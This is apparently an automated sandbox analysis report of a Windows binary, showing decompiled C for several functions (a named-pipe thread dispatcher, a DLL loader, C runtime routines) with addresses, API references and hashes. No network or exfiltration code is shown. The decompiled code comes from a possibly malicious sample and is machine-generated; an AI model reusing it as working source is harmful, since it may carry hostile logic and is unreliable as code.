                        • Opcode Fuzzy Hash: 9a57716c163faac7c5c97df9cef4320d0680e7122a111deceeb5fe89bfb6dfae
                        • Instruction Fuzzy Hash: 9B213075E09252DFD7316F18FC4459E3BE8AF287607144069F6C4A6248C7BE98638F54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01061700 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 103fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 56%
                        			E01061700(long _a4) {
				struct _OVERLAPPED* _v8;
				void _v12;
				void _v28;
				short _v76;
				intOrPtr _t15;
				void* _t33;
				void* _t36;
				void* _t38;
				void* _t39;
				void* _t40;

				_t15 = E01062D5A(_a4, 0, 0xa);
				 *0x1080ea0 = _t15;
				if(_t15 != 0) {
					swprintf( &_v76, 0, L"\\\\.\\pipe\\msica_%x_%d", _t15, 0x20, _t39);
					_t40 = CreateFileW( &_v76, 0xc0000000, 0, 0, 3, 0, 0);
					if(_t40 != 0xffffffff) {
						__imp__CoInitializeEx(0, 0, _t36, _t33);
						if(ReadFile(_t40,  &_v28, 0x10,  &_a4, 0) != 0) {
							_t38 = _a4;
							while(_a4 == 0x10) {
								asm("movq xmm0, [ebp-0x18]");
								asm("movq [edi], xmm0");
								asm("movq xmm0, [ebp-0x10]");
								asm("movq [edi+0x8], xmm0");
								_v12 = CreateThread(0, 0, E01061820, _t38, 0, 0);
								_v8 = 0;
								if(WriteFile(_t40,  &_v12, 8,  &_a4, 0) != 0 && _a4 == 8 && ReadFile(_t40,  &_v28, 0x10,  &_a4, 0) != 0) {
									continue;
								}
								goto L10;
							}
						}
						L10:
						__imp__CoUninitialize();
						return GetLastError();
					} else {
						return GetLastError();
					}
				} else {
					return 1;
				}
			}













                        0x0106170d
                        0x01061715
                        0x0106171c
                        0x01061738
                        0x01061759
                        0x0106175e
                        0x01061773
                        0x01061790
                        0x01061792
                        0x01061795
                        0x0106179b
                        0x010617aa
                        0x010617ae
                        0x010617b7
                        0x010617c4
                        0x010617d2
                        0x010617e1
                        0x00000000
                        0x00000000
                        0x00000000
                        0x010617e1
                        0x01061795
                        0x010617fc
                        0x010617fc
                        0x0106180e
                        0x01061760
                        0x0106176a
                        0x0106176a
                        0x0106171e
                        0x01061726
                        0x01061726

                        APIs
                        • swprintf.LIBCMT ref: 01061738
                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 01061753
                        • GetLastError.KERNEL32 ref: 01061760
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: CreateErrorFileLastswprintf
                        • String ID: \\.\pipe\msica_%x_%d
                        • API String ID: 2902539988-2637677629
                        • Opcode ID: d0ad0177cf56318903f4617d89c6d60be817f8b308d985b93779646d7c250152
                        • Instruction ID: 015d86fb1fc28f1ea0c4df5d32db43eecdcf1bf46c17c40f16496d308c0dc946
                        • Opcode Fuzzy Hash: d0ad0177cf56318903f4617d89c6d60be817f8b308d985b93779646d7c250152
                        • Instruction Fuzzy Hash: 2031B471A40309BAEB319AA4DC46FEE7B7CEB44711F104122FB84EA0C0EBB5A555C7E5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 010665CF Relevance: 16.7, APIs: 11, Instructions: 229COMMON
                        Download Yara Rule
                        C-Code - Quality: 86%
                        			E010665CF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t81;
				void* _t86;
				long _t90;
				signed int _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				signed int _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				signed int _t130;
				signed int _t134;
				signed int _t135;
				signed int _t138;
				void** _t139;
				signed int _t141;
				void* _t142;
				signed int _t143;
				void** _t147;
				signed int _t149;
				void* _t150;
				signed int _t154;
				void* _t155;
				void* _t160;

				_push(0x64);
				_push(0x107e0c0);
				E010668F0(__ebx, __edi, __esi);
				E01064D39(0xb);
				_t130 = 0;
				 *(_t155 - 4) = 0;
				_t160 =  *0x1081c60 - _t130; // 0xbb2cd8
				if(_t160 == 0) {
					_push(0x40);
					_t141 = 0x20;
					_push(_t141);
					_t81 = E01064F0A();
					_t134 = _t81;
					 *(_t155 - 0x24) = _t134;
					__eflags = _t134;
					if(_t134 != 0) {
						 *0x1081c60 = _t81;
						 *0x1081c44 = _t141;
						while(1) {
							__eflags = _t134 - _t81 + 0x800;
							if(_t134 >= _t81 + 0x800) {
								break;
							}
							 *((short*)(_t134 + 4)) = 0xa00;
							 *_t134 =  *_t134 | 0xffffffff;
							 *(_t134 + 8) = _t130;
							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x00000080;
							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x0000007f;
							 *((short*)(_t134 + 0x25)) = 0xa0a;
							 *(_t134 + 0x38) = _t130;
							 *(_t134 + 0x34) = _t130;
							_t134 = _t134 + 0x40;
							 *(_t155 - 0x24) = _t134;
							_t81 =  *0x1081c60; // 0xbb2cd8
						}
						GetStartupInfoW(_t155 - 0x74);
						__eflags =  *((short*)(_t155 - 0x42));
						if( *((short*)(_t155 - 0x42)) == 0) {
							while(1) {
								L31:
								 *(_t155 - 0x2c) = _t130;
								__eflags = _t130 - 3;
								if(_t130 >= 3) {
									break;
								}
								_t147 = (_t130 << 6) +  *0x1081c60;
								 *(_t155 - 0x24) = _t147;
								__eflags =  *_t147 - 0xffffffff;
								if( *_t147 == 0xffffffff) {
									L35:
									_t147[1] = 0x81;
									__eflags = _t130;
									if(_t130 != 0) {
										_t66 = _t130 - 1; // -1
										asm("sbb eax, eax");
										_t90 =  ~_t66 + 0xfffffff5;
										__eflags = _t90;
									} else {
										_t90 = 0xfffffff6;
									}
									_t142 = GetStdHandle(_t90);
									__eflags = _t142 - 0xffffffff;
									if(_t142 == 0xffffffff) {
										L47:
										_t147[1] = _t147[1] | 0x00000040;
										 *_t147 = 0xfffffffe;
										_t94 =  *0x1081d7c; // 0xbb0050
										__eflags = _t94;
										if(_t94 != 0) {
											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
										}
										goto L49;
									} else {
										__eflags = _t142;
										if(_t142 == 0) {
											goto L47;
										}
										_t98 = GetFileType(_t142);
										__eflags = _t98;
										if(_t98 == 0) {
											goto L47;
										}
										 *_t147 = _t142;
										_t99 = _t98 & 0x000000ff;
										__eflags = _t99 - 2;
										if(_t99 != 2) {
											__eflags = _t99 - 3;
											if(_t99 != 3) {
												L46:
												_t70 =  &(_t147[3]); // -17308756
												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
												_t147[2] = _t147[2] + 1;
												L49:
												_t130 = _t130 + 1;
												continue;
											}
											_t103 = _t147[1] | 0x00000008;
											__eflags = _t103;
											L45:
											_t147[1] = _t103;
											goto L46;
										}
										_t103 = _t147[1] | 0x00000040;
										goto L45;
									}
								}
								__eflags =  *_t147 - 0xfffffffe;
								if( *_t147 == 0xfffffffe) {
									goto L35;
								}
								_t147[1] = _t147[1] | 0x00000080;
								goto L49;
							}
							 *(_t155 - 4) = 0xfffffffe;
							E01066893();
							L2:
							_t86 = 1;
							L3:
							return E01066935(_t86);
						}
						_t105 =  *(_t155 - 0x40);
						__eflags = _t105;
						if(_t105 == 0) {
							goto L31;
						}
						_t135 =  *_t105;
						 *(_t155 - 0x1c) = _t135;
						_t106 = _t105 + 4;
						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
						 *(_t155 - 0x20) = _t106 + _t135;
						__eflags = _t135 - 0x800;
						if(_t135 >= 0x800) {
							_t135 = 0x800;
							 *(_t155 - 0x1c) = 0x800;
						}
						_t149 = 1;
						__eflags = 1;
						 *(_t155 - 0x30) = 1;
						while(1) {
							__eflags =  *0x1081c44 - _t135; // 0x20
							if(__eflags >= 0) {
								break;
							}
							_t138 = E01064F0A(_t141, 0x40);
							 *(_t155 - 0x24) = _t138;
							__eflags = _t138;
							if(_t138 != 0) {
								0x1081c60[_t149] = _t138;
								 *0x1081c44 =  *0x1081c44 + _t141;
								__eflags =  *0x1081c44;
								while(1) {
									__eflags = _t138 - 0x1081c60[_t149] + 0x800;
									if(_t138 >= 0x1081c60[_t149] + 0x800) {
										break;
									}
									 *((short*)(_t138 + 4)) = 0xa00;
									 *_t138 =  *_t138 | 0xffffffff;
									 *(_t138 + 8) = _t130;
									 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
									 *((short*)(_t138 + 0x25)) = 0xa0a;
									 *(_t138 + 0x38) = _t130;
									 *(_t138 + 0x34) = _t130;
									_t138 = _t138 + 0x40;
									 *(_t155 - 0x24) = _t138;
								}
								_t149 = _t149 + 1;
								 *(_t155 - 0x30) = _t149;
								_t135 =  *(_t155 - 0x1c);
								continue;
							}
							_t135 =  *0x1081c44; // 0x20
							 *(_t155 - 0x1c) = _t135;
							break;
						}
						_t143 = _t130;
						 *(_t155 - 0x2c) = _t143;
						_t109 =  *((intOrPtr*)(_t155 - 0x28));
						_t139 =  *(_t155 - 0x20);
						while(1) {
							__eflags = _t143 - _t135;
							if(_t143 >= _t135) {
								goto L31;
							}
							_t150 =  *_t139;
							__eflags = _t150 - 0xffffffff;
							if(_t150 == 0xffffffff) {
								L26:
								_t143 = _t143 + 1;
								 *(_t155 - 0x2c) = _t143;
								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
								_t139 =  &(_t139[1]);
								 *(_t155 - 0x20) = _t139;
								continue;
							}
							__eflags = _t150 - 0xfffffffe;
							if(_t150 == 0xfffffffe) {
								goto L26;
							}
							_t111 =  *_t109;
							__eflags = _t111 & 0x00000001;
							if((_t111 & 0x00000001) == 0) {
								goto L26;
							}
							__eflags = _t111 & 0x00000008;
							if((_t111 & 0x00000008) != 0) {
								L24:
								_t154 = ((_t143 & 0x0000001f) << 6) + 0x1081c60[_t143 >> 5];
								 *(_t155 - 0x24) = _t154;
								 *_t154 =  *_t139;
								 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
								_t38 = _t154 + 0xc; // 0xd
								InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
								_t39 = _t154 + 8;
								 *_t39 =  *(_t154 + 8) + 1;
								__eflags =  *_t39;
								_t139 =  *(_t155 - 0x20);
								L25:
								_t135 =  *(_t155 - 0x1c);
								goto L26;
							}
							_t119 = GetFileType(_t150);
							_t139 =  *(_t155 - 0x20);
							__eflags = _t119;
							if(_t119 == 0) {
								goto L25;
							}
							goto L24;
						}
						goto L31;
					}
					E0106ADE0(_t155, 0x1080660, _t155 - 0x10, 0xfffffffe);
					_t86 = 0;
					goto L3;
				}
				E0106ADE0(_t155, 0x1080660, _t155 - 0x10, 0xfffffffe);
				goto L2;
			}





























                        0x010665cf
                        0x010665d1
                        0x010665d6
                        0x010665dd
                        0x010665e3
                        0x010665e5
                        0x010665e8
                        0x010665ee
                        0x0106660e
                        0x01066612
                        0x01066613
                        0x01066614
                        0x0106661b
                        0x0106661d
                        0x01066620
                        0x01066622
                        0x0106663b
                        0x01066640
                        0x01066646
                        0x0106664b
                        0x0106664d
                        0x00000000
                        0x00000000
                        0x0106664f
                        0x01066655
                        0x01066658
                        0x0106665b
                        0x01066664
                        0x01066667
                        0x0106666d
                        0x01066670
                        0x01066673
                        0x01066676
                        0x01066679
                        0x01066679
                        0x01066684
                        0x0106668a
                        0x0106668f
                        0x010667be
                        0x010667be
                        0x010667be
                        0x010667c1
                        0x010667c4
                        0x00000000
                        0x00000000
                        0x010667cf
                        0x010667d5
                        0x010667d8
                        0x010667db
                        0x010667f0
                        0x010667f0
                        0x010667f4
                        0x010667f6
                        0x010667fd
                        0x01066802
                        0x01066804
                        0x01066804
                        0x010667f8
                        0x010667fa
                        0x010667fa
                        0x0106680e
                        0x01066810
                        0x01066813
                        0x0106685a
                        0x01066860
                        0x01066863
                        0x01066869
                        0x0106686e
                        0x01066870
                        0x01066875
                        0x01066875
                        0x00000000
                        0x01066815
                        0x01066815
                        0x01066817
                        0x00000000
                        0x00000000
                        0x0106681a
                        0x01066820
                        0x01066822
                        0x00000000
                        0x00000000
                        0x01066824
                        0x01066826
                        0x0106682b
                        0x0106682e
                        0x01066838
                        0x0106683b
                        0x01066846
                        0x0106684b
                        0x0106684f
                        0x01066855
                        0x0106687c
                        0x0106687c
                        0x00000000
                        0x0106687c
                        0x01066841
                        0x01066841
                        0x01066843
                        0x01066843
                        0x00000000
                        0x01066843
                        0x01066834
                        0x00000000
                        0x01066834
                        0x01066813
                        0x010667dd
                        0x010667e0
                        0x00000000
                        0x00000000
                        0x010667e8
                        0x00000000
                        0x010667e8
                        0x01066882
                        0x01066889
                        0x01066603
                        0x01066605
                        0x01066606
                        0x0106660b
                        0x0106660b
                        0x01066695
                        0x01066698
                        0x0106669a
                        0x00000000
                        0x00000000
                        0x010666a0
                        0x010666a2
                        0x010666a5
                        0x010666a8
                        0x010666ad
                        0x010666b5
                        0x010666b7
                        0x010666b9
                        0x010666bb
                        0x010666bb
                        0x010666c0
                        0x010666c0
                        0x010666c1
                        0x010666c4
                        0x010666c4
                        0x010666ca
                        0x00000000
                        0x00000000
                        0x010666d6
                        0x010666d8
                        0x010666db
                        0x010666dd
                        0x01066771
                        0x01066778
                        0x01066778
                        0x0106677e
                        0x0106678a
                        0x0106678c
                        0x00000000
                        0x00000000
                        0x0106678e
                        0x01066794
                        0x01066797
                        0x0106679a
                        0x0106679e
                        0x010667a4
                        0x010667a7
                        0x010667aa
                        0x010667ad
                        0x010667ad
                        0x010667b2
                        0x010667b3
                        0x010667b6
                        0x00000000
                        0x010667b6
                        0x010666e3
                        0x010666e9
                        0x00000000
                        0x010666e9
                        0x010666ec
                        0x010666ee
                        0x010666f1
                        0x010666f4
                        0x010666f7
                        0x010666f7
                        0x010666f9
                        0x00000000
                        0x00000000
                        0x010666ff
                        0x01066701
                        0x01066704
                        0x0106675e
                        0x0106675e
                        0x0106675f
                        0x01066765
                        0x01066766
                        0x01066769
                        0x0106676c
                        0x00000000
                        0x0106676c
                        0x01066706
                        0x01066709
                        0x00000000
                        0x00000000
                        0x0106670b
                        0x0106670d
                        0x0106670f
                        0x00000000
                        0x00000000
                        0x01066711
                        0x01066713
                        0x01066723
                        0x01066730
                        0x01066737
                        0x0106673c
                        0x01066743
                        0x0106674b
                        0x0106674f
                        0x01066755
                        0x01066755
                        0x01066755
                        0x01066758
                        0x0106675b
                        0x0106675b
                        0x00000000
                        0x0106675b
                        0x01066716
                        0x0106671c
                        0x0106671f
                        0x01066721
                        0x00000000
                        0x00000000
                        0x00000000
                        0x01066721
                        0x00000000
                        0x010666f7
                        0x0106662f
                        0x01066637
                        0x00000000
                        0x01066637
                        0x010665fb
                        0x00000000

                        APIs
                        • __lock.LIBCMT ref: 010665DD
                          • Part of subcall function 01064D39: __mtinitlocknum.LIBCMT ref: 01064D4B
                          • Part of subcall function 01064D39: __amsg_exit.LIBCMT ref: 01064D57
                          • Part of subcall function 01064D39: EnterCriticalSection.KERNEL32(?,?,0106B376,0000000D), ref: 01064D64
                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 010665FB
                        • __calloc_crt.LIBCMT ref: 01066614
                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0106662F
                        • GetStartupInfoW.KERNEL32(?,0107E0C0,00000064), ref: 01066684
                        • __calloc_crt.LIBCMT ref: 010666CF
                        • GetFileType.KERNEL32(00000001), ref: 01066716
                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0106674F
                        • GetStdHandle.KERNEL32(-000000F6), ref: 01066808
                        • GetFileType.KERNEL32(00000000), ref: 0106681A
                        • InitializeCriticalSectionAndSpinCount.KERNEL32(-01081C54,00000FA0), ref: 0106684F
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__amsg_exit__lock__mtinitlocknum
                        • String ID:
                        • API String ID: 301580142-0
                        • Opcode ID: 4cb16c6afe4a550c187688ac884106206aa50aca3dad7c976c3e45f9ef4474fc
                        • Instruction ID: d02c6f26573e3cf54219d590be0414b1c1634ef5372004761c7be1c46be34b2e
                        • Opcode Fuzzy Hash: 4cb16c6afe4a550c187688ac884106206aa50aca3dad7c976c3e45f9ef4474fc
                        • Instruction Fuzzy Hash: BB91B471D0534A8FDB24CF68D8905ADBBF8BF19324B2442ADD4E6A73D1D73A9802CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 010612A0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 40libraryloaderCOMMON
                        Download Yara Rule
                        C-Code - Quality: 60%
                        			E010612A0(WCHAR* _a4, CHAR* _a8, struct HINSTANCE__** _a12) {
				void* __esi;
				void* __ebp;
				struct HINSTANCE__* _t5;
				int _t6;
				void* _t12;
				void* _t13;
				struct HINSTANCE__** _t14;
				void* _t15;

				_t5 = LoadLibraryExW(_a4, 0, 8);
				_t14 = _a12;
				 *_t14 = _t5;
				if(_t5 == 0) {
					_push(_t5);
					_push("Unable to load dll %s\n");
					_t11 = E01062E24() + 0x40;
					_push(E01062E24() + 0x40);
					_t5 = E01062F67(_t12, _t13, _t14, _t11);
					_t15 = _t15 + 0xc;
					ExitProcess(1);
				}
				_t6 = GetProcAddress(_t5, _a8);
				if(_t6 == 0) {
					_push(_a8);
					_push(0x107b314);
					_push("Dll %s does not implement function %s\n");
					_t8 = E01062E24() + 0x40;
					_push(E01062E24() + 0x40);
					E01062F67(_t12, _t13, _t14, _t8);
					_t6 = FreeLibrary( *_t14);
					ExitProcess(1);
				}
				return _t6;
			}











                        0x010612ab
                        0x010612b1
                        0x010612b4
                        0x010612b8
                        0x010612ba
                        0x010612bb
                        0x010612c5
                        0x010612c8
                        0x010612c9
                        0x010612ce
                        0x010612d3
                        0x010612d3
                        0x010612dd
                        0x010612e5
                        0x010612e7
                        0x010612ea
                        0x010612ef
                        0x010612f9
                        0x010612fc
                        0x010612fd
                        0x01061307
                        0x0106130f
                        0x0106130f
                        0x01061317

                        APIs
                        • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,0106102C,?,DllRegisterServer,?), ref: 010612AB
                        • _fprintf.LIBCMT ref: 010612C9
                        • ExitProcess.KERNEL32 ref: 010612D3
                        • GetProcAddress.KERNEL32(00000000,?), ref: 010612DD
                        • _fprintf.LIBCMT ref: 010612FD
                        • FreeLibrary.KERNEL32(?), ref: 01061307
                        • ExitProcess.KERNEL32 ref: 0106130F
                        Strings
                        • Unable to load dll %s, xrefs: 010612BB
                        • Dll %s does not implement function %s, xrefs: 010612EF
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: ExitLibraryProcess_fprintf$AddressFreeLoadProc
                        • String ID: Dll %s does not implement function %s$Unable to load dll %s
                        • API String ID: 1970097361-2710538428
                        • Opcode ID: 108a9684fcc48b2a98b34291ba1ba6e8788f8077c34c7e359738004402a4b5fa
                        • Instruction ID: eef788b28d1eff7ddc5ed73dfef5aabfd499977a017bbb5781ead36e0250d6b9
                        • Opcode Fuzzy Hash: 108a9684fcc48b2a98b34291ba1ba6e8788f8077c34c7e359738004402a4b5fa
                        • Instruction Fuzzy Hash: 14F04472940305FBEB122FA69C09B893A5CEF10751F004414FAD5E9141EA7795504795
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 01075B9D Relevance: 15.1, APIs: 10, Instructions: 131COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 84%
                        			E01075B9D(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
				signed int _v8;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _t38;
				signed int _t45;
				signed int _t60;
				intOrPtr _t77;
				void* _t80;
				intOrPtr* _t82;
				signed int _t83;
				signed int _t86;
				intOrPtr _t88;
				void* _t92;

				_t80 = __edx;
				_push(__ebx);
				_push(__esi);
				_t86 = 0;
				if(_a12 <= 0) {
					L5:
					return _t38;
				} else {
					_push(__edi);
					_t82 =  &_a12;
					while(1) {
						_t82 = _t82 + 4;
						_t38 = E01072387(_a4, _a8,  *_t82);
						_t92 = _t92 + 0xc;
						if(_t38 != 0) {
							break;
						}
						_t86 = _t86 + 1;
						if(_t86 < _a12) {
							continue;
						} else {
							goto L5;
						}
						goto L20;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E01064748(0, _t80);
					asm("int3");
					_push(0x14);
					_push(0x107e528);
					E010668F0(0, _t82, _t86);
					_t66 = 0;
					_v32 = 0;
					__eflags = _a4 - 5;
					if(__eflags <= 0) {
						_t88 = E0106B2AD(_t80, _t82, __eflags);
						_v36 = _t88;
						E010702E6(0, _t80, _t82, _t88, __eflags);
						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
						_v8 = _v8 & 0;
						_t83 = E01064F0A(0xb8, 1);
						_v40 = _t83;
						__eflags = _t83;
						if(_t83 != 0) {
							E01064D39(0xc);
							_v8 = 1;
							E010755D5(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
							_v8 = _v8 & 0x00000000;
							E01075D12();
							_t66 = E01075ECD(0, _t80, _t83, _t88, _t83, _a4, _a8);
							_v32 = _t66;
							__eflags = _t66;
							if(_t66 == 0) {
								E0107024B(_t83);
								_t43 = E010700F1(_t83);
							} else {
								__eflags = _a8;
								if(_a8 != 0) {
									_t60 = E010796BD(_a8, 0x1080bd0);
									__eflags = _t60;
									if(_t60 != 0) {
										 *0x1081c2c = 1;
									}
								}
								E01064D39(0xc);
								_v8 = 2;
								_t25 = _t88 + 0x6c; // 0x6c
								E01070362(_t25, _t83);
								E0107024B(_t83);
								__eflags =  *(_t88 + 0x70) & 0x00000002;
								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
									__eflags =  *0x1080e04 & 0x00000001;
									if(( *0x1080e04 & 0x00000001) == 0) {
										E01070362(0x1080d3c,  *((intOrPtr*)(_t88 + 0x6c)));
										_t77 =  *0x1080d3c; // 0x1080d40
										_t32 = _t77 + 0x84; // 0x1080e30
										 *0x1080e28 =  *_t32;
										_t33 = _t77 + 0x90; // 0x107c400
										 *0x1080678 =  *_t33;
										_t34 = _t77 + 0x74; // 0x1
										 *0x1080e00 =  *_t34;
									}
								}
								_v8 = _v8 & 0x00000000;
								_t43 = E01075D21();
							}
						}
						_v8 = 0xfffffffe;
						E01075D54(_t43, _t88);
						_t45 = _t66;
					} else {
						 *((intOrPtr*)(E010647CC(__eflags))) = 0x16;
						E0106471D();
						_t45 = 0;
					}
					return E01066935(_t45);
				}
				L20:
			}

















                        0x01075b9d
                        0x01075ba0
                        0x01075ba3
                        0x01075ba4
                        0x01075ba9
                        0x01075bcd
                        0x01075bd0
                        0x01075bab
                        0x01075bab
                        0x01075bac
                        0x01075baf
                        0x01075baf
                        0x01075bba
                        0x01075bbf
                        0x01075bc4
                        0x00000000
                        0x00000000
                        0x01075bc6
                        0x01075bca
                        0x00000000
                        0x01075bcc
                        0x00000000
                        0x01075bcc
                        0x00000000
                        0x01075bca
                        0x01075bd1
                        0x01075bd2
                        0x01075bd3
                        0x01075bd4
                        0x01075bd5
                        0x01075bd6
                        0x01075bdb
                        0x01075bdc
                        0x01075bde
                        0x01075be3
                        0x01075be8
                        0x01075bea
                        0x01075bed
                        0x01075bf1
                        0x01075c0f
                        0x01075c11
                        0x01075c14
                        0x01075c19
                        0x01075c1d
                        0x01075c2e
                        0x01075c30
                        0x01075c33
                        0x01075c35
                        0x01075c3d
                        0x01075c43
                        0x01075c4e
                        0x01075c55
                        0x01075c59
                        0x01075c6d
                        0x01075c6f
                        0x01075c72
                        0x01075c74
                        0x01075d2d
                        0x01075d33
                        0x01075c7a
                        0x01075c7a
                        0x01075c7e
                        0x01075c88
                        0x01075c8f
                        0x01075c91
                        0x01075c93
                        0x01075c93
                        0x01075c91
                        0x01075c9f
                        0x01075ca5
                        0x01075cac
                        0x01075cb1
                        0x01075cb7
                        0x01075cbf
                        0x01075cc3
                        0x01075cc5
                        0x01075ccc
                        0x01075cd6
                        0x01075cdd
                        0x01075ce3
                        0x01075ce9
                        0x01075cee
                        0x01075cf4
                        0x01075cf9
                        0x01075cfc
                        0x01075cfc
                        0x01075ccc
                        0x01075d01
                        0x01075d05
                        0x01075d05
                        0x01075c74
                        0x01075d3a
                        0x01075d41
                        0x01075d46
                        0x01075bf3
                        0x01075bf8
                        0x01075bfe
                        0x01075c03
                        0x01075c03
                        0x01075d4d
                        0x01075d4d
                        0x00000000

                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                        • String ID:
                        • API String ID: 790675137-0
                        • Opcode ID: f5afad9bbba9115668c032d2a93cd3fb34ab3c3b2ecf79689cbf704c044a23d7
                        • Instruction ID: 44c9edf2cae7b300ca5cc1bfbfcae5c5fbaa916b790161151fbfcaac399cd8b0
                        • Opcode Fuzzy Hash: f5afad9bbba9115668c032d2a93cd3fb34ab3c3b2ecf79689cbf704c044a23d7
                        • Instruction Fuzzy Hash: DB410272D0430AAFDB20BFA8DC84BDD37E4BF14314F108569F9C896180DB7699028B59
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 010727FD Relevance: 13.6, APIs: 9, Instructions: 66COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E010727FD(void* __eflags, signed int _a4) {
				void* _t12;
				signed int _t13;
				signed int _t16;
				intOrPtr _t18;
				void* _t22;
				signed int _t35;
				long _t40;

				_t13 = E01066594(_t12);
				if(_t13 >= 0) {
					_t35 = _a4;
					if(E01070E34(_t35) == 0xffffffff) {
						L10:
						_t40 = 0;
					} else {
						_t18 =  *0x1081c60; // 0xbb2cd8
						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
								goto L8;
							} else {
								goto L7;
							}
						} else {
							L7:
							_t22 = E01070E34(2);
							if(E01070E34(1) == _t22) {
								goto L10;
							} else {
								L8:
								if(CloseHandle(E01070E34(_t35)) != 0) {
									goto L10;
								} else {
									_t40 = GetLastError();
								}
							}
						}
					}
					E01070DAE(_t35);
					 *((char*)( *((intOrPtr*)(0x1081c60 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
					if(_t40 == 0) {
						_t16 = 0;
					} else {
						_t16 = E010647AB(_t40) | 0xffffffff;
					}
					return _t16;
				} else {
					return _t13 | 0xffffffff;
				}
			}










                        0x01072800
                        0x01072807
                        0x01072810
                        0x0107281d
                        0x0107286f
                        0x0107286f
                        0x0107281f
                        0x0107281f
                        0x01072827
                        0x01072835
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0107283d
                        0x0107283d
                        0x0107283f
                        0x01072851
                        0x00000000
                        0x01072853
                        0x01072853
                        0x01072863
                        0x00000000
                        0x01072865
                        0x0107286b
                        0x0107286b
                        0x01072863
                        0x01072851
